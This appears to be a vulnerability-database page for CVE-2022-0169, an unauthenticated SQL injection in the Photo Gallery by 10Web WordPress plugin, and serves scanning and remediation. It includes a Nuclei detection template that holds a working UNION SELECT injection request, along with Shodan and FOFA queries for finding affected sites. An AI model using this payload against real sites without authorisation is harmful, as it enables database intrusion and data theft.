Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-0169
HistoryAug 02, 2023 - 8:39 a.m.

Photo Gallery by 10Web < 1.6.0 - SQL Injection

2023-08-0208:39:49
ProjectDiscovery
github.com
4
cve2022
wpscan
wordpress
sql injection
photo gallery
10web
vulnerability

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.011 Low

EPSS

Percentile

84.3%

The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection
id: CVE-2022-0169

info:
  name: Photo Gallery by 10Web < 1.6.0 - SQL Injection
  author: ritikchaddha,princechaddha
  severity: critical
  description: |
    The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: This is resolved in release 1.6.0.
  reference:
    - https://wpscan.com/vulnerability/0b4d870f-eab8-4544-91f8-9c5f0538709c
    - https://wordpress.org/plugins/photo-gallery/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0169
    - https://plugins.trac.wordpress.org/changeset/2672822/photo-gallery#file9
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0169
    cwe-id: CWE-89
    epss-score: 0.01246
    epss-percentile: 0.85214
    cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 10web
    product: photo_gallery
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/photo-gallery
    fofa-query: body=/wp-content/plugins/photo-gallery
    publicwww-query: "/wp-content/plugins/photo-gallery"
  tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022064759738b702e3e2b8635c38219338faa75f1319271621dd38a9ae88af4c9782022100d6d0a9a1e9303895054138f4e3021dc5bd8b5ba30a52f3528fb0fc3cc46b2e67:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.011 Low

EPSS

Percentile

84.3%